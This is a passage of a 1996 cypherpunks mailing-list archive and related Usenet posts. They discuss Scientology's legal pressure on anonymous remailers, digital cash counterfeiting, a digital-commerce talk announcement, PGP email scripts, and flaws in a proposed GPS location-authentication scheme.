Path: news.cybercom.net!dial2-30.cybercom.net!user
From: rnewman@cybercom.net (Ron Newman)
Newsgroups: alt.privacy.anon-server,alt.religion.scientology,comp.org.eff.talk
Subject: Warning - Scientology attacking remailers again!
Date: Wed, 10 Apr 1996 11:15:40 -0500
Organization: Cyber Access Internet Services (617) 396-0491
Lines: 138
Distribution: inet
Message-ID: <rnewman-1004961115400001@dial2-30.cybercom.net>
NNTP-Posting-Host: dial2-30.cybercom.net
Keywords: Scientology remailers anon penet anonymous Grady Ward
Xref: news.cybercom.net alt.privacy.anon-server:3524
alt.religion.scientology:78833 comp.org.eff.talk:25569

The following are a series of messages from Grady Ward, which he
has authorized me to distribute to the Net at large.   Grady is
being sued by the Church of Scientology for alleged copyright
violation (they claim he is the mysterious "Scamizdat", which he
denies.)  For more details, see 

   http://www.cybercom.net/~rnewman/scientology/grady/home.html
   http://www.northcoast.com/~grady/

According to Grady, the CoS has once again demanded access to
anon.penet.fi, and may soon subpoena other remailers as well:

-------
Date: Thu, 04 Apr 1996 08:52:38 -0800
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>

I've just received e-mail from:

kaj.malmberg@mallu.pp.fi (Kaj Malmberg)

The Poilice CID in Helsinki who is being pushed by the criminal
cult yet again to get a search warrant for Julf's anonymous remailer,
claiming I have been violating my injunction to post cult crap.

I told him that as usual the criminal cult is lying and that I gave him
and Julf explicit permission to investigate any or all of my posts I
have ever made through the remailer.

The criminal cult is trying to use the fact of my injunction to further
their own conspiracy theories.  South Africa, Finland, where does
it end?

Grady

-------------
Date: Fri, 05 Apr 1996 07:41:25 -0800
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>
Subject: Re: Kaj Malmberg, Finland

At 10:11 AM 4/5/96 -0500, you wrote:

>Why did you give them this permission?  I think it sets a VERY bad
>precedent.  [deleted] was upset when I mentioned this
>yesterday afternoon -- he thinks you're being
>too nice, polite, and cooperative for your own good.

I like to err on the side of openness. Each to their own I suppose.
Basically I trust Kaj to sense who is the criminal perpetrator in this case.
I also sent him the set of trial stipulations in the Snow White case that
ought to give him very interesting background on the criminal cult.

>In my opinion, Julf and the Finnish cop should Just Say No
>to the CoS.

He is still free to do as he wishes.

------------
Date: Tue, 09 Apr 1996 14:16:32 -0700
To: Ron Newman <rnewman@cybercom.net>
From: Grady Ward <grady@northcoast.com>
Subject: Re: a few more questions

At 04:56 PM 4/9/96 -0400, you wrote:
>Was anyone with you (on YOUR side) at either day's deposition?
>
>How many hours total did you go each day?

No one was with me.

Total hours day one: 7.5
Total hours day two: 3.25 hours, as per order of Judge Infante.
Also I believe all american anonymous remailers will be subpoenaed
for their records as will all my ISPs, and contents of safety
deposit box held as evidence.


--------
Date: Tue, 09 Apr 1996 19:37:57 -0700
To: Ron Newman <rnewman@cybercom.net>
From: Grady Ward <grady@northcoast.com>
Subject: Re: what is the latest regarding penet?

I don't know what's up today, but Julf wrote yesterday
to tell me that my id grady@northcoast.com had NOT
been used to go through his remailer.

No word on what the police are doing to subpoena his system,
if they are.

Grady

--------------
Date: Tue, 09 Apr 1996 22:57:26 -0700
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>
Subject: Re: what is the latest regarding penet?

At 01:52 AM 4/10/96 -0500, you wrote:

>Was something else used to go through his remailer?
>
>Has he said anything in public about this?
>
>Should I post your message about it on my web site?

That is all he told me: that he could verify to authorities
that grady@northcoast.com had not used his remailer.

He didn;t mention anyone else or how he was helping the CID
with their inquiries.  Yes, you can put this datum on the web.

--------------
Date: Wed, 10 Apr 1996 07:17:01 -0700
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>
Subject: Re: what is the latest regarding penet?

Ron,

Yes do please distribute my messages as you deem
necessary.  Some people ought to be aware of what is
coming down.

My feeling is that they will be doing anything they can
to attempt to produce "hard evidence" that I am part of
the Grand Conspiracy. I would say it is virtually certain
that U.S. anon remailers will be subpoenaed as well as any
foreign ones in which they can handle the authorities.

Grady Ward           |                   | http://www.northcoast.com/~grady
+1 707 826 7715      |                   |
(voice/24hr FAX)     | 34877c8566839cb7  |
grady@northcoast.com | aeab8ec5e5ee97fe  |
-- 
Ron Newman             rnewman@cybercom.net
Web: http://www.cybercom.net/~rnewman/home.html







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 11 Apr 1996 17:45:31 +0800
To: cypherpunks@toad.com
Subject: Re: Scientologists may subpoena anonymous remailer records?
In-Reply-To: <Pine.SUN.3.91.960410112759.13271B-100000@eff.org>
Message-ID: <4lP0MUS00YUv4jzXV4@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message begins here ----------

Date: Wed, 10 Apr 1996 11:38:58 -0700 (PDT)
From: Declan McCullagh <declan@eff.org>
To: fight-censorship+@andrew.cmu.edu
cc: rnewman@cybercom.net, grady@northcoast.com, kaj.malmberg@mallu.pp.fi,
        sthomson@netcom.com
Subject: Re: Anonymous Remailer threat: Scientologists may subpoena
anonymous remailer records?

Ron, thanks for the background about the CoS's renewed attempts to get a 
search warrant for anon.penet.fi. I hope you don't get dragged into this 
any more than you already are.

Grady Ward writes below, in a message dated this morning:

  > I would say it is virtually certain that U.S. anon remailers will
  > be subpoenaed as well as any foreign ones in which they can handle
  > the authorities.

Yikes! Jim's alert was timely.

-Declan

[This message is archived at http://fight-censorship.dementia.org/top/]


// declan@eff.org // I do not represent the EFF // declan@well.com //


Date: Wed, 10 Apr 1996 10:18:35 -0500
From: Ron Newman <rnewman@cybercom.net>
Subject: Re: Clams subpoena'ing anonymous remailer records?

Here's what Grady said to me in several messages.  Note that
they seem to be after anon.penet.fi again too.

(He has given me blanket permission to distribute his e-mail to me to
 anyone who may find it of use.)

-------
Date: Thu, 04 Apr 1996 08:52:38 -0800
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>

I've just received e-mail from:

kaj.malmberg@mallu.pp.fi (Kaj Malmberg)

The Poilice CID in Helsinki who is being pushed by the criminal
cult yet again to get a search warrant for Julf's anonymous remailer,
claiming I have been violating my injunction to post cult crap.

I told him that as usual the criminal cult is lying and that I gave him
and Julf explicit permission to investigate any or all of my posts I
have ever made through the remailer.

The criminal cult is trying to use the fact of my injunction to further
their own conspiracy theories.  South Africa, Finland, where does
it end?

Grady

-------------
Date: Fri, 05 Apr 1996 07:41:25 -0800
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>
Subject: Re: Kaj Malmberg, Finland

At 10:11 AM 4/5/96 -0500, you wrote:

>Why did you give them this permission?  I think it sets a VERY bad
>precedent.  Chris Schafmeister was upset when I mentioned this
>on the IRC channel yesterday afternoon -- he thinks you're being
>too nice, polite, and cooperative for your own good.

I like to err on the side of openness. Each to their own I suppose.
Basically I trust Kaj to sense who is the criminal perpetrator in this case.
I also sent him the set of trial stipulations in the Snow White case that
ought to give him very interesting background on the criminal cult.

>In my opinion, Julf and the Finnish cop should Just Say No
>to the CoS.

He is still free to do as he wishes.

------------
Date: Tue, 09 Apr 1996 14:16:32 -0700
To: Ron Newman <rnewman@cybercom.net>
From: Grady Ward <grady@northcoast.com>
Subject: Re: a few more questions

[Regarding the depositions. --Declan]

No one was with me.

Total hours day one: 7.5
Total hours day two: 3.25 hours, as per order of Judge Infante.
Also I believe all american anonymous remailers will be subpoenaed
for their records as will all my ISPs, and contents of safety
deposit box held as evidence.

At 04:56 PM 4/9/96 -0400, you wrote:
>Was anyone with you (on YOUR side) at either day's deposition?
>
>How many hours total did you go each day?
>

--------
Date: Tue, 09 Apr 1996 19:37:57 -0700
To: Ron Newman <rnewman@cybercom.net>
From: Grady Ward <grady@northcoast.com>
Subject: Re: what is the latest regarding penet?

I don't know what's up today, but Julf wrote yesterday
to tell me that my id grady@northcoast.com had NOT
been used to go through his remailer.

No word on what the police are doing to subpoena his system,
if they are.

Grady

--------------
Date: Tue, 09 Apr 1996 22:57:26 -0700
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>
Subject: Re: what is the latest regarding penet?


That is all he told me: that he could verify to authorities
that grady@northcoast.com had not used his remailer.

He didn;t mention anyone else or how he was helping the CID
with their inquiries.  Yes, you can put this datum on the web.

At 01:52 AM 4/10/96 -0500, you wrote:

>Was something else used to go through his remailer?
>
>Has he said anything in public about this?
>
>Should I post your message about it on my web site?


Grady Ward           |                   | http://www.northcoast.com/~grady
+1 707 826 7715      |                   |
(voice/24hr FAX)     | 34877c8566839cb7  |
grady@northcoast.com | aeab8ec5e5ee97fe  |

--
Ron Newman             rnewman@cybercom.net
Web: http://www.cybercom.net/~rnewman/home.html


Here are some other messages that Grady sent me in the
last few days.  I'll put some of this on my web site in
the near future.

------------
Date: Tue, 09 Apr 1996 13:34:20 -0700
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>
Subject: Re: deposition

At 11:05 AM 4/9/96 -0500, you wrote:
>When are the remaining 1.5 hours of deposition scheduled?
>Are you holding firm to the 9 hour limit?

I held firm to my nine hour limit; they held firm to their 2+ day limit.

Hogan called me a "liar" on the record, a term I reciprocated on the record.

This time there were a lot of questions about you two, Ron and Shelley.
I predict that you two will be served a subpoena soon to either be
deposed yourself or to have your e-mail and archives produced in evidence.

We got onto the phone with Judge Infante and he told us to finish by 12:15.

Which we did.  The only other issue is that the cult wanted to immediately
seize my safety deposit box contents.  I asked that any seizures be made
pursuant to a Special Master or other neutral party taking control and
analyzing the significance of the contents of the backup disks therein.

We got back on the phone with Infante and while he did not sanction
the seizure by the scientologists, he did "freeze" the contents so as
to preserve possible evidence.

Grady

We finished as per the Judges order at 12:15.  The criminal cultists were
somewhat unhappy at their interrogation being cut short.

One strange man whose picture I will post soon was apparently the
go-between between Warren McShane and ??? (speculating David
Miscavige/OSA).  The receptionist said she had not seen as many faxes in
one day as had come to her office during my deposition. He was constantly
ferrying stuff from the fax to McShane and Kobrin or constantly talking on
a cellphone.  But he and McShane looked for the world as simply carrying
out their master's orders. 

-------------
Date: Tue, 09 Apr 1996 13:36:27 -0700
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>
Subject: Re: who were the CoS lawyers who deposed you?

Hogan and Eric Lieberman.  Both were assisted by Kobrin and McShane.

Also in the room was a cult computer expert, and a couple of helpers
for Lieberman and McShane.

----------
Date: Tue, 09 Apr 1996 13:41:46 -0700
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>
Subject: Re: Henson page added, Grady page updated

Today's deposition realaudio will be available as depo_7 through depo_10
in about an hour at my site.  You were the topic of some detailed
questions about e-mail and phone conversations.

------------
To: Ron Newman <rnewman@cybercom.net>
From: Grady Ward <grady@northcoast.com>
Subject: Re: who did they ask about in the depo, besides Shelley and me?

At 06:38 PM 4/9/96 -0400, you wrote:
>Someone listened to one of the files and noticed that they asked
>about Maureen Garde.  Who else did they ask about?

They were most interested in *you*, then Jeff Jacobsen, then Keith Henson,
then each of the other list people in turn. If I were a betting man, I
would say you are going to be subpoenaed to be deposed real soon now.

--------------
Date: Wed, 10 Apr 1996 07:17:01 -0700
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>
Subject: Re: what is the latest regarding penet?

Ron,

Yes do please distribute my messages as you deem
necessary.  Some people ought to be aware of what is
coming down.

My feeling is that they will be doing anything they can
to attempt to produce "hard evidence" that I am part of
the Grand Conspiracy. I would say it is virtually certain
that U.S. anon remailers will be subpoenaed as well as any
foreign ones in which they can handle the authorities.

I did tell you that they sprung a surpise motion on me and
Judge Infante during day #2 of the deposition by asking him
if their computer expert could make copies of the contents thereof
to look for contraband?

I objected on the grounds that it was a thinly disguised seizure
request (which had already been denied by Judge Whyte) and that
the box contained much private material such as letters to my wife, etc.

The judge did agree to another motion however made by Hogan
to "freeze" the contents of the box to "preserve evidence".

Obviously any motion that they make to examine the contents will
be met by a demand that only a mutually agree 3rd party using
an agreed upon protocol (i.e. grepping for an agreed list of
patterns) will be permitted. No mass copying, no random cult
fishing.

Grady Ward           |                   | http://www.northcoast.com/~grady
+1 707 826 7715      |                   |
(voice/24hr FAX)     | 34877c8566839cb7  |
grady@northcoast.com | aeab8ec5e5ee97fe  |









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 11 Apr 1996 16:33:35 +0800
To: cypherpunks@toad.com
Subject: DCSB: Gold Denominated Burmese Opium Futures?
Message-ID: <v02120d01ad91ae0e2a95@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                            Perry E. Metzger

         "Possible Futures: The Impact of Ubiquitous High Speed
               Networking on Intermediation and Regulation"

                                  or

        "With Spring Street Brewing shares trading on the web, are
            gold denominated Burmese opium futures inevitable?"



                        *Monday*, May 6, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA



Perry Metzger is the President of Piermont Information Systems Inc.,
a consulting firm specializing in communications and computer
systems security. He has worked for, or consulted to, the New York
financial community for most of the last decade. He has been
strongly involved with the Internet Engineering Task Force's
security area for some time, and is the author of several security
related RFCs. He is also the co-chair of the IETF's Simple Public
Key Infrastructure working group, which is developing public key
cryptographic standards for the internet.

Networking technology is racing far ahead of culture. Fiber optics
offer the possibility of cheap truly ubiquitous internet service in
the tens of gigabits per second within the decade, and cheap high
speed mobile connectivity is also likely. We will likely live in a
world where anyone can sit in a park with a cheap laptop and
communicate over a multi-megabit per second channel to any other
civilized location on the planet. This development may radically
change our culture, and with it the nature of regulation and
intermediation in the marketplace. Although opium futures trading
might not be inevitable, the scope of the trends we are facing should
not be underestimated. Mr. Metzger will discuss these and similar
developments; he will also discuss the limits to our ability to
predict or alter the course such changes will take.



This meeting of the Digital Commerce Society of Boston will be held on
*Monday*, May 6, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

Please note that this meeting is on *Monday* this month, due to a scheduling
problem at the Harvard Club. We go back to meeting on the first Tuesday of
the month in June.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, March 30, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be sent
back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 June        Dan Shutzer      FSTC
 July        Pete Loshin      Author, "Electronic Commerce"
 August      Duane Hewitt     Idea Futures

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWv8/PgyLN8bw6ZVAQGu/gQAkdtTIsK6rbboD6NRVjpZD8WFMXgZGlOB
5MA4znnY/XC6qNvVseRRq0wcPukNsGoQdCE8LwwqS2oWdyMXlWdUO7RK+CgCvOGj
48HjCVcgItM4V3BW9W5CM897zBWAwfcCkfbzngwuhzinu0MHWgPK/MMSFX73/dtH
2kg/41CA6MM=
=Tfdk
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 11 Apr 1996 15:20:18 +0800
To: cypherpunks@toad.com
Subject: Re: Tense visions of future imperfect
Message-ID: <199604102201.PAA13082@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 AM 4/9/96 -0800, frantz@netcom.com (Bill Frantz) wrote:
>>   Financial Times, April 9, 1996, p. 13.

>>   Garfinkel described it like this: "My name is Agent
>>   Jenkins. I'm an investigator with the secret service,
>>   working on a counterfeiting case. And it's tough. Last
>>   year, my office got a priority call from an economist at
>>   Stanford. The economist was looking at something called the
>>   money supply and velocity and both were increasing a little
>>   too fast. They just didn't add up. The economist finally
>>   figured an organisation was printing its own electronic
>>   money -- just like the US government does.

Personally, I find the idea that the government could hope to track the economy
so closely as to notice a $10M/year addition to the money supply to
be disturbing (though it was done in a science fiction story about
20 years ago :-)  With digital cash, it's also unrealistic - we
finally have a technology for moving money around _without_
them being able to track it all, if we want to deploy it.

>>   "This counterfeit currency looked just like the real thing,
>>   except it was a fraud. She even found some of it -- a
>>   digital dollar that was signed and sealed by the US
>>   government's secret key, yet had a serial number that had
>>   never been issued. The money that was being made was on the
>>   Net. It was everywhere and nowhere. And it was encrypted,
>>   so that we wouldn't even know it if we found it. Last
>>   month, we estimate, the total fraud was up to $900,000 a
>>   month, and it is increasing still."
>
>I don't see how this third scam would work in a system such as DigiCash
>which uses online clearing.  Unissued serial numbers would be refused when
>presented for clearing.

In Chaum's DigiCash, the payer makes up the serial number, blinds it,
and has the bank sign it blind, so the bank never knows the number
until the payee deposits it.  So this doesn't work.
(The payee knows the number when he receives it from the payer,
but in online operation he deposits it right away.)
(There are alternative ways to structure transactions so the payee
issues the serial number, or even so the bank does, but they're not needed.)

What the bank _does_ know is whether the total number of digibucks with
its signature on them that it's received is larger than the number it's signed -
so if their private signature key has been stolen by counterfeiters,
they'll know for sure once the counterfeiting level exceeds the amount of
float of outstanding digibucks they've issued; they may suspect it earlier
if the redemption level is high enough that the float statistics look real
funny.

On the other hand, with Chaum's system, what role would the US government
have in issuing digibucks, rather than banks doing it?  The one-big-bank
approach doesn't scale well, though I suppose the Feds could pay member banks
with digibucks instead of paperbucks or journal entries if they wanted to,
and FedBucks might be more spendable in some markets than VisaBucks or
TwainBucks
or MeritaKroner or HKL$ or YakuzaYen or Chemical$ or CocaRubles.

>If this kind of scam, particularly the counterfeiting scam,
>occurs too often, public trust in the cash will disappear, and people will
>refuse to buy it.

In a  multiple-bank scenario, that works fine.  With a government-issued
legal-tender digital currency, it's an offer you can't refuse...

>Note that people trying to maintain anonymity are particularly vulnerable
>since they have to hold cash for a period of time to defeat traffic
>analysis attacks.

Holding digital cash for a long time isn't difficult - it's easier than
holding paper cash for a long time, since you can keep multiple encrypted
copies (so stealing them isn't very useful to the thief and isn't as
damaging to the victim), and you can stash floppies in smaller, less armored
safe deposit boxes than you'd need for large quantities of cash.
Of course, if you happen to become dead while you're storing it,
the paper cash is far more useful to your heirs, so I assume we'll have
a government-sponsored cash-escrow system announced soon to protect
the government's interest in collection of inheritance taxes...
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Powers Glenn" <Q101NOW@st.vse.cz>
Date: Thu, 11 Apr 1996 06:51:30 +0800
To: cypherpunks@toad.com
Subject: Re: CoS supoenas records of all anonymous remailers?
Message-ID: <62B33F2344@st.vse.cz>
MIME-Version: 1.0
Content-Type: text/plain


- >        The church of scientology plans to subpoena the records of every
- >anonymous remailer in the USA.

    Isn't this in violation of the Electronic Communication Privacy 
Act?

glenn 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@ACM.ORG>
Date: Thu, 11 Apr 1996 11:17:36 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Remailer threat: Scientologists may subpoena anonymous remailer records?
Message-ID: <2.2.32.19960410193734.00694638@tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 AM 4/10/96 -0700, Jim Warren wrote:
>My understanding is that the most famous remailer, anon.penet.fi, is of the
>first flavor -- and was raided by reps of the Church of Scientology,
>several years ago, with a Finnish search warrant, and that this produced
>some [much?] of the evidence against their opponent who had allegedly been
>splattering COS copyrighted "works" all over the net.  (Interesting
>application of private property rights -- protecting religious secrets.)

The story is weirder than that.  The first poster of church secrets (with
lots of commentary) was Dennis Erlich, an ex-scientologist.  Dennis was
raided and sued, and is awaiting trial.  His ISP, Tom Klemesrud, refused
to cancel Dennis' account, and so was sued, and is awaiting trial.  A lady
met Klemesrud in a bar, identified herself as an IRS agent, and talked her
way into Klemesrud's apartment.  She proceeded to remove her clothes and
spread blood all over the apartment.  She there identified herself as a
representative of the Church of Scientology.

Klemesrud posted an account of this bizarre affair to alt.religion.scientology,
and an anonymous poster "-AB-", using anon.penet.fi, posted a differing version
of events.  The Church went ballistic over this post, and raided anon.penet.fi
to find the identity of -AB-.  This turned out to be an alumni account at
Cal Tech.  The poster has never been heard from again.

The raid on anon.penet.fi occurred in Feb. 1995.

"Scamizdat" has never used anon.penet.fi, and his (their?) identity is still
unknown.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Thu, 11 Apr 1996 10:38:46 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <960410155213_466752269@emout07.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-04-10 10:33:19 EDT, D. Denning allegedly writes:

>For two-way authentication, the reverse process would be performed. In the
>current implementation, location signatures are 20,000 bytes. For
>continuous authentication, an additional 20 bytes per second are
>transferred. Re- authorization can be performed every few seconds or
>longer. The location signature is virtually impossible to forge at the
>required accuracy. This is because the GPS observations at any given time
>are essentially unpredictable to high precision due to subtle satellite
>orbit perturbations, which are unknowable in real-time, and intentional
>signal instabilities  (dithering) imposed by the U.S. Department of Defense
>selective availability (SA) security policy. Further, because a signature
>is invalid after five milliseconds, the attacker cannot spoof the location

Umm, excuse me, but doesn't it take longer than 5 ms for a data packet to
transit from point A to point B?  We ARE talking about transmitting via the
Net here, aren't we?

>by replaying an intercepted signature, particularly when it is bound to the

Replaying an intercepted signature would completely unnecessary.  GPS
positions are calculated by comparing the phase differential between several
different satellite signals.  It would be trivial for anyone who understands
the inner workings of reprogram their GPS receiver (or build a hacked one) to
give a false location.  Simply calculate the distances to the satellites
relative to your position, (GPS already does this to determine your position)
and then calculate them in reference to another location. (This other
location would have to be close enough to receive signals from four of the
same satellites that you are receiving, if I remember GPS specs correctly.)
 Phase-shifting the signals according to the distance differences between
your true location and the other location yields a signal set that can be fed
into any GPS receiver to yield the other location, in real time.

>message (e.g., through a checksum or digital signature). Continuous
>authentication provides further protection against such attacks.

See above.  Is this a troll?

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 11 Apr 1996 14:51:04 +0800
To: perry@piermont.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <v02120d2bad91ecd377cc@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:48 4/10/96, Duncan Frissell wrote:
[...]
>We know that governments would like to impose things like the Simple
>Tax Transfer Protocol on the Net as well as Is A Person (and Is A Minor)
>Protocols.

There is one thing about the proposed minor flag addition to IP that I
don't understand. [No, I am not surprised by this. Mandatory authorization
to establish a connection and an "Internet Driver License", probably in the
form or a smart card are coming].

If my computer creates the IP packet, what is there to prevent me from
modifying the value of the "Minor/Adult" flag at my leisure?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 12 Apr 1996 07:21:39 +0800
To: <cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <199604101956.MAA09258@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Peter - didn't they say that the checking station is also listening
> to the satellites?  That way they can tell that you are playing back
> signals that you taped earlier because they won't match what the
> satellites are broadcasting right now.
> 
> I think your idea would work if you wanted to pretend to be at a point
> which was _farther_ from each of the satellites than where you actually
> are.  Then you could delay all of the signals.  But the only way to
> be farther would be to be deep underground.  You might be able to pretend
> to be at the center of the earth, but that is not very useful.
> 
> Actually I suppose this only applies to those satellites which are shared
> between you and the checkin station.  If you are far away then maybe you
> only share one or two.  If you know which ones those are, you can lie to
> your heart's content about other ones, and for the shared ones you can
> again delay the signal and claim to be farther than you are.
> 
> If their authenticated repeaters are used then you have to assume the
> checking station has all the satellite signals and again the best you can
> do is pretend to be a Mole Man.
> 
> Hal

Denning hasn't thought this through. Do the math.

The diameter of the earth is 12,576 km
The speed of light is about 3e5 km/sec

-> max phase shift to simulate = 42 msec.

This is on roughly the same scale as network delays, or less. 

If you are trying to simulate a location in roughly the same area as your
actual location (say, on the same continent), the max phase shift to simulate is
a lot smaller - probably less than 5 ms.

The site checking the incoming packets for their origin has to allow for
realistic network delays - say 100 -200 ms.

Therefore any site that can see the same set of satellites as the site it is
trying to simulate can do so, buffering less than 50 ms of waveforms and
pretending to be on the end of a slow link.

Denning's plan: A beautiful idea murdered by cold, unfeeling facts.


 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 14 Apr 1996 03:14:08 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: PEP Announcement (fwd)
Message-ID: <v02120d14ad91c581ad03@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 2:28 PM 4/10/96, Black Unicorn wrote:
> This showed up in my mailbox:

<snip>
> PEP: Pretty Easy Privacy, a set of scripts for OneClick that integrate
> Eudora and MacPGP are now available in the latest Button Circle release
>at:
>
><ftp://ftp.westcodesoft.com/pub/westcode/Contributions/OCButtonCircleMarch9
>6.sit
> .hqx>

I'm using it. I actually went out and bought OneClick to do so, mostly
because I wanted to mess around with scripts for other things and OneClick
looks pretty painless to use.

PEP works pretty much as advertised, except that the finger operations take
too long for my ISP to execute sometimes, and evidently the finger events
in Eudora aren't robust enough to wait for the operations to complete, so a
"wait" has to run. The work-around is to manually do the finger instensive
"get cypherpunks remailer names" and "get remailer-keys" operations with
eudora, copy the results, and then run the scripts.


Anyway, I bashed on it, and PGP, a bit, and now there's a palette when I
use Eudora which I can click to do chained remails, which I was never
really able to do before. It also does signs, which are fine, and encrypts,
which are also fine, but the decrypts come up in the PGP window, which is
crypto-correct, I suppose, but I like the dump-it-into-it's-own-mail-window
result of the original OSA scripts which come with MacPGP. This is useful
if you actually want to reply to an encrypted mail message. One of the
other things that is nice about the original MacPGP scripts is that they
automatically verify signatures on decryption, and, at the same time, they
also automagically add any attached keys to your keyring, pending
certification, etc.

Anyway, if you have OneClick already, then PEP is a way cool thing to have.

Here. I'll sign this message with it.

Cheers,
Bob Hettinga


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWwYUvgyLN8bw6ZVAQEUKgP/eXQsCS/AaAj07s9PAX07j5WcXCXDGvpF
RxDSLqJNA3wOcU3QKrDc/T0HfzQELM/RbjOvDy7XPWUwxEN/SUTfRzAekYtJ6RbM
2w3CDYtNsdXyv4yyrgNF1eIjs+IecYYrCBeXJcvHn6fRwEbVBr+yFgXIprjfeEZ9
of/IGHDE0Qc=
=bshY
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Thu, 11 Apr 1996 19:33:15 +0800
To: cypherpunks@toad.com
Subject: Bay Area Meeting on Saturday?
Message-ID: <4khh99$d44@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

So, will there be a Bay Area meeting on Saturday?  Where?  etc...

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWxHeUZRiTErSPb1AQHzlAP+N3q0syVT6pmrEDDUGfY7spKqJQkFDtcU
HFbzihOAHsYLzgERQoi5yLe4487ApKTpqR8ohly28R0ZLA98tV0Ev/8KHaHYJxTn
/3BAL/Xj2jtVS2gvKBzyshUnh7QqyZeq1jmV4Y+lRigFggiJgENrWSnJLKfr5zwM
csc/0838gqw=
=LcIY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Thu, 11 Apr 1996 13:23:28 +0800
To: cypherpunks@toad.com
Subject: Re: Message not deliverable
Message-ID: <960410164932_268662594@emout10.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>Subj:	Message not deliverable
>Date:	96-04-10 11:51:09 EDT
>From:	Administrator_at_DCACINTS@dca.com (Administrator)
>To:	JonWienke@aol.com

[body text deleted]

Has anyone else been getting these when they post to cpunks?  I get one every
